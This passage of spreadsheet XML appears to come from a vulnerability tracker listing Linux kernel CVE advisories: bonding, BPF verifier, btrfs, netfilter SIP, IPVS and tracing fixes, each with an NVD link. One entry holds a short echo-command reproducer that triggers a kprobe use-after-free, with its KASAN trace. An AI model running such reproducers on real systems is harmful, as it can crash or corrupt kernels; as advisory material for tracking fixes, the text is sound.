both in uninterruptible wait_event() with no timeout.  A lost wake-up
strands the shutdown worker on its single-threaded workqueue until
some other sender releases the bit again - and on a connection that
is being torn down precisely because it failed, there may never be
another sender.
The barrier used to be there: release_in_xmit() did clear_bit()
followed by smp_mb__after_atomic() until commit 1422f28826d2 ("rds:
introduce acquire/release ordering in acquire/release_in_xmit()")
folded both into clear_bit_unlock(), which strengthened the lock
hand-off but silently dropped the full barrier the wake-up check
depends on.  The refill counterpart, release_refill() in
net/rds/ib_recv.c, still carries its smp_mb__after_atomic() for
exactly this reason.
Use wq_has_sleeper(), which is waitqueue_active() preceded by the
required full barrier.</t>
        </is>
      </c>
      <c r="T697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98072</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98074</t>
        </is>
      </c>
      <c r="D698" s="5" t="inlineStr"/>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="inlineStr"/>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr"/>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q698" s="5" t="inlineStr"/>
      <c r="R698" s="5" t="inlineStr"/>
      <c r="S698" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bonding: do not clear curr_active_slave prematurely when releasing all slaves
When releasing all slaves during bond destruction (all == true),
__bond_release_one() unconditionally clears bond-&gt;curr_active_slave to
NULL in every iteration.
If a backup slave is released before the active slave,
bond_alb_deinit_slave() triggers rlb_teach_disabled_mac_on_primary(),
which increments the active slave dev promiscuity counter and sets
bond_info-&gt;primary_is_promisc = 1.
Because bond-&gt;curr_active_slave was prematurely cleared to NULL when
releasing the backup slave, the subsequent iteration releasing the active
slave evaluates oldcurrent as NULL, so bond_change_active_slave(bond, NULL)
is skipped. Consequently, bond_alb_handle_active_change() is never called
to decrement the promiscuity counter, permanently leaking promiscuous
mode on the physical device after bond teardown.
When oldcurrent == slave, bond_change_active_slave(bond, NULL) already sets
bond-&gt;curr_active_slave to NULL. We only need to avoid selecting a new
active slave when all == true. Replace the if (all) branch with
if (!all &amp;&amp; oldcurrent == slave).</t>
        </is>
      </c>
      <c r="T698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98074</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98075</t>
        </is>
      </c>
      <c r="D699" s="5" t="inlineStr"/>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="inlineStr"/>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q699" s="5" t="inlineStr"/>
      <c r="R699" s="5" t="inlineStr"/>
      <c r="S699" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: reject BPF_PSEUDO_FUNC reference to the main program
fixups.c:jit_subprogs() rewrites BPF_PSEUDO_FUNC loads to contain real
function addresses. This function is invoked from bpf_jit_subprogs()
only when env-&gt;subprog_cnt &gt; 1. Meaning that for any program like
below:
  int main(void *ctx) {
    void *ptr = main;
    ...
    bpf_timer_set_callback(..., ptr);
    ...
  }
The 'ptr' won't be ever converted to contain an address.
In combination with e.g. bpf_timer_set_callback() this would lead to a
function call at a bogus address.
Instead of complicating the implementation, just assume that no useful
program needs main to be a sync or async callback and reject
BPF_PSEUDO_FUNC loads for the main subprogram.</t>
        </is>
      </c>
      <c r="T699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98075</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98076</t>
        </is>
      </c>
      <c r="D700" s="5" t="inlineStr"/>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="inlineStr"/>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr"/>
      <c r="L700" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q700" s="5" t="inlineStr"/>
      <c r="R700" s="5" t="inlineStr"/>
      <c r="S700" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing/probes: Fix use-after-free on field name/type of events with multiple probes
The fields of a probe-based dynamic event (kprobe, uprobe, eprobe and
fprobe events) are created in traceprobe_define_arg_fields() by handing
the probe_arg name/type strings to trace_define_field(), which only
stores the pointers without copying. Those strings are owned by the
trace_probe and are freed when that probe is removed.
An event can have several probes attached. The field list is defined
only once, by the first probe that registers the event, but it is kept
alive by any surviving sibling probe. Deleting just that first probe by
symbol -
  # primary A: fields are defined from A's args
  echo 'p:kprobes/ev vfs_read  a1=$arg1' &gt;  kprobe_events
  # append B: shares A's event call
  echo 'p:kprobes/ev vfs_write a1=$arg1' &gt;&gt; kprobe_events
  # delete only A (matched by symbol), B survives
  echo '-:kprobes/ev vfs_read'           &gt;&gt; kprobe_events
frees A's args (trace_probe_cleanup() -&gt; traceprobe_free_probe_arg()),
but trace_probe_unlink() keeps the trace_probe_event because the probe
list is not empty. The event call stays registered via B while its
fields now reference freed memory. Any field lookup then reads it, e.g.
  echo 'a1 == 1' &gt; events/kprobes/ev/filter
  BUG: KASAN: slab-use-after-free in strcmp+0xa7/0xb0
  Call Trace:
   strcmp
   trace_find_event_field
   parse_pred
   process_preds
   create_filter
   apply_event_filter
   event_filter_write
field-&gt;name references parg-&gt;name (kstrdup'd, freed with the probe) and,
for array arguments, field-&gt;type references parg-&gt;fmt (kmalloc'd, freed
with the probe) - the scalar type otherwise points at the static
fmttype rodata, which is safe.
Have traceprobe_define_arg_fields() duplicate the name and type strings
and anchor the copies on the trace_probe_event, which embeds the event
call and outlives every individual probe; trace_probe_event_free()
releases them.
The reproducer above triggers reliably; the field lookup and the delete
both run under event_mutex, so this is a dangling reference after
removal rather than a race.
The issue was found by the autokbug dynamic kernel fuzzer at Tencent
Yunding Lab.</t>
        </is>
      </c>
      <c r="T700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98076</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98077</t>
        </is>
      </c>
      <c r="D701" s="5" t="inlineStr"/>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="inlineStr"/>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q701" s="5" t="inlineStr"/>
      <c r="R701" s="5" t="inlineStr"/>
      <c r="S701" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_conntrack_sip: fix OOB read in sip_skip_whitespace()
sip_skip_whitespace() returns dptr unchanged when its own loop
exhausts the buffer (dptr == limit), instead of NULL like its sibling
sip_follow_continuation() returns on its own "no more data" path.
ct_sip_get_header() only checks for NULL after calling it:
  dptr = sip_skip_whitespace(dptr, limit);
  if (dptr == NULL)
          break;
  if (*dptr != ':' || ++dptr &gt;= limit)
          break;
so a recognized header name followed only by spaces/tabs running to
the exact end of the SIP payload, with no colon, makes the very next
statement read one byte past the buffer.
Make both "no more data" outcomes return NULL, matching the
convention sip_follow_continuation() already uses and that both
existing callers already check for.</t>
        </is>
      </c>
      <c r="T701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98077</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98078</t>
        </is>
      </c>
      <c r="D702" s="5" t="inlineStr"/>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="inlineStr"/>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q702" s="5" t="inlineStr"/>
      <c r="R702" s="5" t="inlineStr"/>
      <c r="S702" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipvs: fix reversed sequence option serialization
hton_seq() expects the host-order source first and the unaligned
network-order destination second. The version 1 sync sender passes these
arguments in reverse for both sequence blocks. This leaves 24 bytes of the
kmalloc-backed message unwritten. It may disclose stale heap data and
replace the live connection sequence state with values read from the
buffer.
Pass the connection sequence state as the source and the message payload as
the destination for both blocks.</t>
        </is>
      </c>
      <c r="T702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98078</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98079</t>
        </is>
      </c>
      <c r="D703" s="5" t="inlineStr"/>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="inlineStr"/>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q703" s="5" t="inlineStr"/>
      <c r="R703" s="5" t="inlineStr"/>
      <c r="S703" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zstd: fix lost wakeup when waiting for a workspace
A writer can sleep forever in zstd_get_workspace() even though a workspace
is free.  When zstd_alloc_workspace() fails, the task is queued on
zwsm-&gt;wait and schedules unconditionally, never re-testing the pool.
zstd_put_workspace() publishes the workspace and then calls cond_wake_up(),
which only wakes when a sleeper is already visible, so a workspace returned
between the failed allocation and prepare_to_wait() wakes nobody.  The
window is wide: zstd_alloc_workspace() goes through kvmalloc() and may
enter reclaim.
Only a max level workspace triggers the wakeup and one is deliberately kept
allocated as the fallback every waiter waits for, so once its wakeup is
lost the writer stays in TASK_UNINTERRUPTIBLE until some other task happens
to return one.  Re-check the pool after prepare_to_wait() has published the
waiter, and use the workspace if one turned up.</t>
        </is>
      </c>
      <c r="T703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98079</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98080</t>
        </is>
      </c>
      <c r="D704" s="5" t="inlineStr"/>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="inlineStr"/>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q704" s="5" t="inlineStr"/>
      <c r="R704" s="5" t="inlineStr"/>
      <c r="S704" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not force reloc root creation during qgroup_account_snapshot()
[BUG]
When running btrfs/252 with quota enabled through MKFS_OPTIONS="-O quota",
it has a high chance to trigger the following kernel warning and flips
the fs RO:
  BTRFS info (device dm-2): relocating block group 30408704 flags metadata|dup
  ------------[ cut here ]------------
  WARNING: fs/btrfs/extent-tree.c:879 at lookup_inline_extent_backref+0x74b/0x960 [btrfs], CPU#4: btrfs/2173
  CPU: 4 UID: 0 PID: 2173 Comm: btrfs Not tainted 7.2.0-rc6-custom+ #457 PREEMPT(full)  3adc6528fb66f7a55fe1095385818e742f200aab
  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS unknown 02/02/2022
  RIP: 0010:lookup_inline_extent_backref+0x74b/0x960 [btrfs]
  Call Trace:
   &lt;TASK&gt;
   insert_inline_extent_backref+0x7c/0x160 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   __btrfs_inc_extent_ref+0xa9/0x270 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   __btrfs_run_delayed_refs+0x4af/0x11c0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_run_delayed_refs+0x9d/0xf0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   create_pending_snapshot+0x39d/0xf00 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   create_pending_snapshots+0x9b/0xc0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_commit_transaction+0x280/0xeb0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   prepare_to_relocate+0x147/0x200 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   relocate_block_group+0x6b/0x5e0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_relocate_block_group+0x92c/0x2380 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_relocate_chunk+0x3f/0x1a0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_balance+0xa2c/0x19c0 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   btrfs_ioctl+0x2839/0x2d30 [btrfs 32f09462c54d9c922fca74a3e4866f4aa7737b72]
   __x64_sys_ioctl+0x416/0x9a0
   do_syscall_64+0xe1/0x790
   entry_SYSCALL_64_after_hwframe+0x4b/0x53
   &lt;/TASK&gt;
  ---[ end trace 0000000000000000 ]---
  BTRFS info (device dm-2): leaf 4593991680 gen 233 total ptrs 175 free space 5953 owner 2
  BTRFS info (device dm-2): refs 3 lock_owner 2173 current 2173
  	item 0 key (166772736 METADATA_ITEM 1) itemoff 16250 itemsize 33
  		extent refs 1 gen 222 flags 2
  		ref#0: tree block backref root 266
         [ Skip the tree dump ]
  	item 174 key (263225344 METADATA_ITEM 0) itemoff 10328 itemsize 33
  		extent refs 1 gen 162 flags 258
  		ref#0: tree block backref root 267
  BTRFS error (device dm-2): extent item not found for insert, bytenr 179847168 num_bytes 16384 parent 4594335744 root_objectid 273 owner 0 offset 0
  BTRFS error (device dm-2): failed to run delayed ref for logical 179847168 num_bytes 16384 type 182 action 1 ref_mod 1: -117
[CAUSE]
The above error is showing that there is a tree reference to a metadata
extent that is no longer there.
With "ref_verify" mount option (requires CONFIG_BTRFS_DEBUG), there is
some extra debug output:
  BTRFS error (device dm-2): dumping block entry [180961280 16384], num_refs 0, metadata 1, from disk 0
  BTRFS error (device dm-2):   root entry 256, num_refs 18446744073709551615
  BTRFS error (device dm-2):   root entry 273, num_refs 18446744073709551615
  BTRFS error (device dm-2):   Ref action 3, root 273, ref_root 273, parent 0, owner 0, offset 0, num_refs 1
     btrfs_force_cow_block+0x129/0x7d0 [btrfs]
     btrfs_cow_block+0x10a/0x250 [btrfs]
     btrfs_search_slot+0x5eb/0xf40 [btrfs]
     btrfs_insert_empty_items+0x3a/0x70 [btrfs]
     insert_with_overflow+0x53/0x130 [btrfs]
     btrfs_insert_dir_item+0x125/0x290 [btrfs]
     btrfs_add_link+0xaa/0x410 [btrfs]
     btrfs_rename+0x5ea/0xcd0 [btrfs]
     btrfs_rename2+0x28/0x60 [btrfs]
     vfs_rename+0x5b2/0xe10
     filename_renameat2+0x244/0x430
     __x64_sys_rename+0x48/0x70
     do_syscall_64+0xe1/0x790
     entry_SYSCALL_64_after_hwframe+0x4b/0x53
---truncated---</t>
        </is>
      </c>
      <c r="T704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98080</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98081</t>
        </is>
      </c>
      <c r="D705" s="5" t="inlineStr"/>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="inlineStr"/>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr"/>
      <c r="S705" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zoned: finish active block group cleanup if call_zone_finish() fails
do_zone_finish() clears BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE before finishing
the zones. If call_zone_finish() then fails it returned early, leaving the
now inactive block group on fs_info-&gt;zone_active_bgs, leaking its
reference, the BTRFS_FS_NEED_ZONE_FINISH waiters are never woken, and as
its alloc_offset equals the zone capacity btrfs_zone_finish_one_bg() keeps
selecting it, spinning btrfs_zoned_activate_one_bg().
Fall through to the cleanup on failure too and return the error, but keep
the block group read-only as its zones are left inconsistent.</t>
        </is>
      </c>
      <c r="T705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98081</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98082</t>
        </is>
      </c>
      <c r="D706" s="5" t="inlineStr"/>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="inlineStr"/>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr"/>
      <c r="S706" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix the possible bioc_list memory leak during error
There are two possible ways to leak bioc memory on
btrfs_ordered_extent::bioc_list:
- An error occurred for btrfs_insert_one_raid_extent()
  Then the function btrfs_insert_raid_extent() immediately return
  without freeing any bioc in the bioc_list.
- An ordered extent hit an IO error
  In that case the ordered extent will have BTRFS_ORDERED_IOERR set, and
  skip the call on btrfs_insert_raid_extent() completely.
Fix the problem by:
- Introduce a new helper, btrfs_cleanup_ordered_bioc_list()
  Which will remove all bioc from the bioc_list, and release the bioc.
- Call the above helper for btrfs_insert_raid_extent()
  So that the cleanup helper is always called no matter what.
- Call the above helper for btrfs_finish_one_ordered()
  This is called just before the final release on the ordered extent.
This was reported by Sashiko when reviewing another patch.</t>
        </is>
      </c>
      <c r="T706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98082</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98084</t>
        </is>
      </c>
      <c r="D707" s="5" t="inlineStr"/>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="inlineStr"/>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr">
        <is>
          <t>checkpoint</t>
        </is>
      </c>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q707" s="5" t="inlineStr"/>
      <c r="R707" s="5" t="inlineStr"/>
      <c r="S707" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: backtracking shouldn't clear outer frame R1-R5 for callbacks
When processing calls to bpf_loop() verifier marks R1 (and R4) as
precise. R1 tracks loop iterations number and because of the
'callback_depth &lt; R1' mechanics in check_helper_call() must be marked
precise. However, precision propagation for R1 was broken,
when bpf_loop() call was verified on a second iteration.
Consider the following verification trace:
- main: bpf_loop(nr_loops, callback ...)
- callback: BPF_EXIT
- main: bpf_loop(nr_loops, callback ...)
- ...
While the first visit of the call to bpf_loop() propagated R1
precision as expected, the second call to mark_chain_precision() in
the check_helper_call() set R1, but it was immediately reset when
backtrack_insn() processed preceding BPF_EXIT in the loop deleted in
this patch.
Because of that, the second visit of the call to bpf_loop() injected
checkpoint with R1 not marked as precise. Which could trick the
verifier into accepting unsafe programs. See the next patch for an
example of such program.
Commit is structured in a way to minimize conflicts when
'bpf' would be eventually merged with 'bpf-next'.</t>
        </is>
      </c>
      <c r="T707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98084</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98085</t>
        </is>
      </c>
      <c r="D708" s="5" t="inlineStr"/>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="inlineStr"/>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q708" s="5" t="inlineStr"/>
      <c r="R708" s="5" t="inlineStr"/>
      <c r="S708" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: backtrack_insn(): Handle ld_{abs,ind} subprog exit edge
Nicholas Carlini reported a bug in precision backtracking mechanism
for BPF_LD | BPF_{IND,ABS} instructions. These instructions are
modelled as two branches:
- fallthrough;
- implicit exit from current subprogram.
The implicit exit case was not handled by the backtrack_insn()
function. When backtracking such a path backtrack_insn() did not
call bt_subprog_enter(), which meant that backtracking continued
manipulating precision marks in a caller frame, while looking at
instructions in a callee frame.
This lead to segmentation faults during verification (see the
selftest), or unsound state pruning.</t>
        </is>
      </c>
      <c r="T708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98085</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98086</t>
        </is>
      </c>
      <c r="D709" s="5" t="inlineStr"/>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="inlineStr"/>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr">
